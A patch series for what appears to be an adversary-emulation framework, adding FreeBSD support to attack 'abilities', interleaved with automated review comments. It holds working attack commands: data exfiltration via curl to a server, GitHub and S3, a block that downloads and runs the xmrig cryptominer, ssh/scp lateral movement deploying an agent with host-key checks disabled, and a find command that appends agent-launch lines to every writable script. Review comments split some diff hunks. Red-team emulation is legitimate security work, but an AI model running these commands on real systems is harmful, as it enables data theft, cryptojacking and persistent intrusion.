diff --git a/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml b/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml index 884d3b27..dda4fa6f 100644 --- a/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml +++ b/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml @@ -6,7 +6,7 @@ attack_id: T1083 name: File and Directory Discovery platforms: - linux: + freebsd,linux: sh: command: 'find ~ -type f -name #{host.print.file} 2>/dev/null' parsers: diff --git a/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml b/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml index 14db1bb2..6bf357df 100644 --- a/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml +++ b/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml @@ -12,6 +12,10 @@ sh: command: | python3 --version;python2 --version;python --version + freebsd: + sh: + command: | + pkg version -x python3 | cut -d '-' -f2 | awk '{print $1}' && pkg version -x python2 | cut -d '-' -f2 | awk '{print $1}' linux: sh: command: | diff --git a/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml b/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml index 6ebc8595..ddcafe2d 100644 --- a/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml +++ b/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml @@ -8,7 +8,7 @@ attack_id: T1016 name: System Network Configuration Discovery platforms: - darwin: + darwin,freebsd: sh: command: | - ifconfig | grep broadcast \ No newline at end of file + ifconfig | grep broadcast diff --git a/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml b/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml index df30b696..55e5ef80 100644 --- a/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml +++ b/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml 
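Review bot: The `freebsd` stanza of b18e8767 reports package versions from `pkg version -x python3`, which is not what the other platforms report: the regex also matches the `python3` meta-package (version strings like `3_3`) and every `python3NN` package, so the output is a list of package versions rather than the interpreter's `--version`, and anything downstream expecting one version per interpreter sees a different shape. If the `python3`/`python2` meta-packages are assumed present (the regex suggests they are), the darwin/linux form `python3 --version;python2 --version;python --version` gives the same output on FreeBSD. Also, `&&` between the two pipelines means a failure in the first suppresses the second, unlike the `;`-separated form used above. The linux stanza continues below the hunk.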
@@ -12,7 +12,7 @@ sh: command: | whoami - linux: + freebsd,linux: sh: command: | whoami diff --git a/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml b/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml index 1e08608c..3f91e87c 100644 --- a/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml +++ b/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml @@ -15,7 +15,7 @@ plugins.stockpile.app.parsers.basic: - source: host.user.name - source: domain.user.name - linux: + freebsd,linux: sh: command: whoami parsers: diff --git a/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml b/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml index 388e56a2..be9a2330 100644 --- a/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml +++ b/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml @@ -15,7 +15,7 @@ parsers: plugins.stockpile.app.parsers.basic: - source: host.user.name - linux: + freebsd,linux: sh: command: | cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#' diff --git a/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml b/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml index 2fc29c5b..1228ccca 100644 --- a/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml +++ b/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml @@ -8,7 +8,7 @@ attack_id: T1018 name: Remote System Discovery platforms: - linux: + freebsd,linux: sh: command: host "#{target.org.domain}" | grep mail | grep -oE '[^ ]+$' | rev | cut -c 2- | rev parsers: diff --git a/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml b/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml index 8239d2ad..7cfe40f5 100644 --- a/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml +++ b/data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml 
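Review bot: Merging `freebsd` into the stanza of ce485320 makes it depend on `host`, which has not been part of the FreeBSD base system since BIND left base (it comes from `dns/bind-tools`); on a stock host the command fails and the parser receives nothing. `drill` (ldns, in base) can answer the same MX query, but its output layout differs from `host`, so the `grep`/`cut` pipeline would need its own `freebsd` stanza rather than the shared key. The parser block continues below the hunk.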
@@ -12,7 +12,7 @@ sh: command: | sudo ifconfig - linux: + freebsd,linux: sh: command: | sudo ifconfig diff --git a/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml b/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml index 550c6051..5ea5b46e 100644 --- a/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml +++ b/data/abilities/discovery/e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml @@ -12,6 +12,10 @@ sh: command: | pwpolicy getaccountpolicies + freebsd: + sh: + command: | + cat /etc/pam.d/passwd linux: sh: command: | @@ -19,4 +23,4 @@ windows: psh: command: | - net accounts \ No newline at end of file + net accounts diff --git a/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml b/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml index abcca65e..08828ecf 100644 --- a/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml +++ b/data/abilities/discovery/fa6e8607-e0b1-425d-8924-9b894da5a002.yml @@ -15,7 +15,7 @@ parsers: plugins.stockpile.app.parsers.basic: - source: host.current.time - linux: + freebsd,linux: sh: command: | date -u +"%Y-%m-%dT%H:%M:%SZ" diff --git a/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml b/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml index 371c6cb9..3a844d29 100644 --- a/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml +++ b/data/abilities/execution/b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml @@ -14,7 +14,7 @@ pkill -f sandcat payloads: - sandcat.go - linux: + freebsd,linux: sh: command: | nohup ./sandcat.go -server #{server} & diff --git a/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml b/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml index 25e15895..c3b00bbf 100644 --- a/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml +++ b/data/abilities/exfiltration/0582dc26-e0cf-4645-88cf-f37a02279976.yml 
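Review bot: `cat /etc/pam.d/passwd` in the new `freebsd` stanza of e82f39e2 shows which PAM modules are stacked for `passwd`, not the account policy itself; on FreeBSD password and login policy lives in `/etc/login.conf` (capabilities such as `minpasswordlen`, `passwordtime`, `passwd_format`), with per-user overrides in `~/.login_conf`. Reading the login class, `cat /etc/login.conf`, is the closer counterpart of the darwin `pwpolicy` and windows `net accounts` commands. The linux stanza continues below the hunk.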
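Review bot: Adding `freebsd` to the stanza of b1d41972 that launches `./sandcat.go -server #{server}` assumes the server can deliver a FreeBSD build of the sandcat payload; that depends on the sandcat plugin's own platform list, which this commit does not touch, so until it is extended the payload download presumably fails or returns a Linux binary that FreeBSD cannot run without emulation. A cross-reference in the PR description (or a comment in the ability) would make the dependency explicit so the two changes land together. The stanza's `cleanup`/`payloads` block continues outside the hunk.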
@@ -10,7 +10,7 @@ attack_id: T1567.001 name: Exfiltration to Code Repository platforms: - linux: + freebsd,linux: sh: command: | # Temporary file needed to avoid curl length restrictions GHUser="#{github.user.name}"; diff --git a/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml b/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml index a34ec370..9cdec7d8 100644 --- a/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml +++ b/data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml @@ -6,7 +6,7 @@ attack_id: T1029 name: Scheduled Transfer platforms: - linux: + freebsd,linux: sh: command: | crontab -l > /tmp/origcron; @@ -46,4 +46,4 @@ Register-ScheduledTask -TaskName "Scheduled exfiltration" -Trigger $trigger -Action $action; cleanup: | - Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false; \ No newline at end of file + Unregister-ScheduledTask -TaskName "Scheduled exfiltration" -Confirm:$false; diff --git a/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml b/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml index cafa92d4..a7f340ea 100644 --- a/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml +++ b/data/abilities/exfiltration/2f90d4de-2612-4468-9251-b220e3727452.yml @@ -6,7 +6,7 @@ attack_id: T1560.001 name: 'Archive Collected Data: Archive via Utility' platforms: - linux: + freebsd,linux: sh: command: | tar -czf #{host.dir.git}.tar.gz -C "#{host.dir.git}" .; printf #{host.dir.git}.tar.gz; diff --git a/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml b/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml index 71c77fe4..09f41036 100644 --- a/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml +++ b/data/abilities/exfiltration/300157e5-f4ad-4569-b533-9d1fa0e74d74.yml 
@@ -17,7 +17,7 @@
parsers:
plugins.stockpile.app.parsers.basic:
- source: host.dir.compress
- linux:
+ freebsd,linux:
sh:
command: |
tar -P -zcf #{host.dir.staged}.tar.gz #{host.dir.staged} && echo #{host.dir.staged}.tar.gz
@@ -38,4 +38,4 @@
- source: host.dir.compress
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.staged
\ No newline at end of file
+ - source: host.dir.staged
diff --git a/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml b/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml
index 6cd51ee9..737bb25f 100644
--- a/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml
+++ b/data/abilities/exfiltration/3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml
@@ -43,7 +43,7 @@
$result = $sr.ReadToEnd();
$result;
$res.close();
- linux:
+ freebsd,linux:
sh:
command: |
LocalFile='#{host.dir.compress}';
@@ -55,4 +55,4 @@
--data-binary @#{host.dir.compress}
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.compress
\ No newline at end of file
+ - source: host.dir.compress
diff --git a/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml b/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml
index 7a950493..eb782c3a 100644
--- a/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml
+++ b/data/abilities/exfiltration/4a1120a5-971c-457f-bb07-60641b4723fd.yml
@@ -6,7 +6,7 @@
attack_id: T1567.001
name: Exfiltration to Code Repository
platforms:
- linux: # https://docs.github.com/en/rest/reference/repos#contents
+ freebsd,linux: # https://docs.github.com/en/rest/reference/repos#contents
sh:
command: |
GHUser="#{github.user.name}";
diff --git a/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml b/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml
index f292c1ac..1cd2dcf8 100644
--- a/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml
+++ b/data/abilities/exfiltration/5c5b0392-1daa-45e1-967c-2f361ce78849.yml
@@ -11,7 +11,7 @@
attack_id: T1030
name: Data Transfer Size Limits
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase '#{host.archive.password}' > #{host.dir.staged}.tar.gz.gpg;
diff --git a/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml b/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml
index ce41f732..30c3d06d 100644
--- a/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml
+++ b/data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml
@@ -7,7 +7,7 @@
attack_id: T1567.001
name: Exfiltration to Code Repository
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
GHUser="#{github.user.name}";
@@ -62,4 +62,4 @@
};
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.staged
\ No newline at end of file
+ - source: host.dir.staged
diff --git a/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml b/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml
index 193539c9..030a0931 100644
--- a/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml
+++ b/data/abilities/exfiltration/ba0deadb-97ac-4a4c-aa81-21912fc90980.yml
@@ -9,7 +9,7 @@
attack_id: T1537
name: 'Transfer Data to Cloud Account'
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
LocalFile='#{host.dir.compress}';
diff --git a/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml b/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml
index a294634c..d88272bd 100644
--- a/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml
+++ b/data/abilities/exfiltration/d754878c-17dd-46dc-891c-a993f8a10336.yml
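Review bot: `gpg -c --pinentry-mode=loopback` now runs on FreeBSD too, but gpg is not in the FreeBSD base system (security/gnupg) and `--pinentry-mode` needs GnuPG 2.1+, so on a stock host the pipeline produces an empty `.tar.gz.gpg` and the staged data is never encrypted. Guard the dependency ahead of the tar line: `command -v gpg >/dev/null 2>&1 || { echo 'gpg not installed'; exit 1; };`. Passing `#{host.archive.password}` via `--passphrase` exposes it in the process list; that is inherited from the linux variant rather than introduced here, but a `# NOTE: passphrase is visible in ps while gpg runs` comment on the command would make the trade-off explicit.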
@@ -8,7 +8,7 @@
attack_id: T1048.003
name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
LocalFile='#{host.dir.compress}';
@@ -35,4 +35,4 @@
$requestStream.Dispose();
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.compress
\ No newline at end of file
+ - source: host.dir.compress
diff --git a/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml b/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml
index c2be2101..cf862323 100644
--- a/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml
+++ b/data/abilities/exfiltration/e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml
@@ -8,7 +8,7 @@
attack_id: T1567.002
name: 'Exfiltration to Cloud Storage'
platforms:
- linux:
+ freebsd,linux:
sh:
command: |
LocalFile='#{host.dir.compress}';
@@ -30,4 +30,4 @@
aws s3 rm s3://#{s3.source.name}/$RemoteName;
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- - source: host.dir.compress
\ No newline at end of file
+ - source: host.dir.compress
diff --git a/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml b/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
index 7556131c..23bf3981 100644
--- a/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
+++ b/data/abilities/exfiltration/ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml
@@ -12,7 +12,7 @@
sh:
command: |
curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload
- linux:
+ freebsd,linux:
sh:
command: |
curl -F "data=@#{host.dir.compress}" --header "X-Request-ID: `hostname`-#{paw}" #{server}/file/upload
diff --git a/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml b/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml
index a18739cf..a69a9ea0 100644
--- a/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml
+++ b/data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml
@@ -19,6 +19,19 @@
cleanup: |
rm -rf ./xmrig*;
timeout: 120
+ freebsd:
+ sh:
+ # FreeBSD should include `timeout` making this easy.
+ # We expect timeout to return a 124, which needs to then return a 0
+ # to make Caldera UI happy.
+ command: |
+ wget https://github.com/xmrig/xmrig/releases/download/v6.19.2/xmrig-6.19.2-freebsd-static-x64.tar.gz;
+ tar -xf xmrig-6.19.2-freebsd-static-x64.tar.gz;
+ timeout 60 ./xmrig-6.19.2/xmrig;
+ [ $? -eq 124 ]
+ cleanup: |
+ rm -rf ./xmrig*;
+ timeout: 120
darwin:
sh:
# MacOS does not include timeout, but can mimic the process with screen.
diff --git a/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml b/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml
index 722ff8bc..c5dd3a75 100644
--- a/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml
+++ b/data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml
@@ -12,7 +12,7 @@
sh:
command: |
echo "proof that this machine was hacked." > message.txt
- linux:
+ freebsd,linux:
sh:
command: |
echo "proof that this machine was hacked." > message.txt
diff --git a/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml b/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml
index 0421f020..566c3df7 100644
--- a/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml
+++ b/data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml
@@ -7,7 +7,7 @@
command: ./mission.go -duration 60 -extension .caldera -dir '/'
payloads:
- mission.go
- linux:
+ freebsd,linux:
sh:
command: ./mission.go -duration 60 -extension .caldera -dir '/'
payloads:
diff --git a/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml b/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml
index 073039cc..57d0f31c 100644
--- a/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml
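Review bot: the new freebsd block downloads and executes a release binary with no integrity check, and it fetches it with `wget`, which is not in the FreeBSD base system (`fetch(1)` is), so on a stock host the download fails, `tar -xf` fails, the miner never starts and the `[ $? -eq 124 ]` check reports the ability as failed. Use the base fetcher and pin the tarball to the checksum published for v6.19.2 before unpacking: `fetch -o xmrig-6.19.2-freebsd-static-x64.tar.gz https://github.com/xmrig/xmrig/releases/download/v6.19.2/xmrig-6.19.2-freebsd-static-x64.tar.gz || exit 1;` then `sha256 -c '<sha256 from the v6.19.2 release page>' xmrig-6.19.2-freebsd-static-x64.tar.gz || exit 1;` — FreeBSD's `sha256 -c` exits non-zero on a mismatch, which the `$?` check will then surface. Running an unverified third-party binary on a target is a supply-chain exposure for the red team, not only for the adversary being emulated, so the existing block comment should also say the download is pinned to a known release hash once it is.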
+++ b/data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml
@@ -15,6 +15,15 @@
ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
payloads:
- sandcat.go-darwin
+ freebsd:
+ sh:
+ command: |
+ scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-freebsd #{remote.ssh.cmd}:~/sandcat.go &&
+ ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'
+ cleanup: |
+ ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'
+ payloads:
+ - sandcat.go-freebsd
linux:
sh:
command: |
diff --git a/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml b/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
index dc3b340c..0c8c4875 100644
--- a/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
+++ b/data/abilities/lateral-movement/4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml
@@ -46,6 +46,14 @@
ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'rm -f sandcat.go'
payloads:
- sandcat.go-darwin
+ freebsd:
+ sh:
+ command: |
+ scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-freebsd #{remote.ssh.cmd}:~/sandcat.go
+ cleanup: |
+ ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'rm -f sandcat.go'
+ payloads:
+ - sandcat.go-freebsd
linux:
sh:
command: |
diff --git a/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml b/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml
index a652b190..8c1817b4 100644
--- a/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml
+++ b/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml
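Review bot: the new freebsd `cleanup` ssh line omits `-o UserKnownHostsFile=/dev/null` while both `command` lines above include it, so the first cleanup run under `StrictHostKeyChecking=no` writes the target's host key into the source agent's `~/.ssh/known_hosts`, an artifact the deploy step was deliberately avoiding; make cleanup match: `ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'`. Disabling host-key verification is presumably intentional for emulation, but it removes MITM protection on the channel the agent binary travels over, which deserves a one-line YAML comment stating that trade-off. The 4908fdc4 hunk on this same line has the identical omission in its cleanup, and both new blocks depend on a `sandcat.go-freebsd` payload that this patch does not show the server producing.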
@@ -12,6 +12,12 @@
find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF "54NDC47_SCRIPT" "{}" || echo "#54NDC47_SCRIPT\n" "chmod +x sandcat.go-darwin && sandcat.go-darwin" >> "{}"; ls "{}" ' \; | echo "complete"
payloads:
- sandcat.go
+ freebsd:
+ sh:
+ command: |
+ find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF "54NDC47_SCRIPT" "{}" || echo "#54NDC47_SCRIPT\n" "chmod +x sandcat.go-freebsd && sandcat.go-freebsd" >> "{}"; ls "{}" ' \; | echo "complete"
+ payloads:
+ - sandcat.go
linux:
sh:
command: |
From 94fd44615085fadb9851362a51034595d99f62b9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alonso=20C=C3=A1rdenas?=
Date: Fri, 12 May 2023 22:45:39 -0500
Subject: [PATCH 2/2] Fix time data does not match issues ValueError: time data '2023-05-12 22:43:46' does not match format '%Y-%m-%dT%H:%M:%SZ'
---
payloads/ragdoll.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/payloads/ragdoll.py b/payloads/ragdoll.py
index 54ebfac0..e1c8e4ad 100644
--- a/payloads/ragdoll.py
+++ b/payloads/ragdoll.py
@@ -63,7 +63,7 @@ def _send_beacon(self):
def _execute_instruction(self, i):
print('[+] Running instruction: %s' % i['id'])
cmd = self._decode_bytes(i['command'])
- execution_timestamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
+ execution_timestamp = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')
try:
output = subprocess.check_output(cmd, shell=True, timeout=i['timeout'])
except subprocess.CalledProcessError as e:
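Review bot: the new freebsd block lists `- sandcat.go` under `payloads:` while the marker it appends to writable scripts executes `sandcat.go-freebsd`, so the file the agent drops is not the name the injected line runs; the lateral-movement hunks in this same patch list `- sandcat.go-freebsd` explicitly, and this block should match (`- sandcat.go-freebsd`) unless the server is known to serve a FreeBSD build under the generic name, which nothing in this patch shows. The injected command also calls the binary without a path and without `-server`, copied verbatim from the darwin entry above, so whether a hijacked script can reach the C2 depends on the build's compiled-in default and is worth a comment or a fix. The enclosing ability continues outside the hunk.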
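Review bot: the new `execution_timestamp` line formats a naive local-time `datetime.datetime.now()` with a trailing `Z`, which asserts UTC; on any agent host not running in UTC the server now accepts a timestamp that is off by the local offset, which skews operation timelines and any detection correlation built from them. Take the time in UTC, matching the `date -u` the discovery ability in the first patch uses for the same format: `execution_timestamp = datetime.datetime.now(datetime.timezone.utc).strftime('%Y-%m-%dT%H:%M:%SZ')`. The rest of `_execute_instruction` lies outside the hunk.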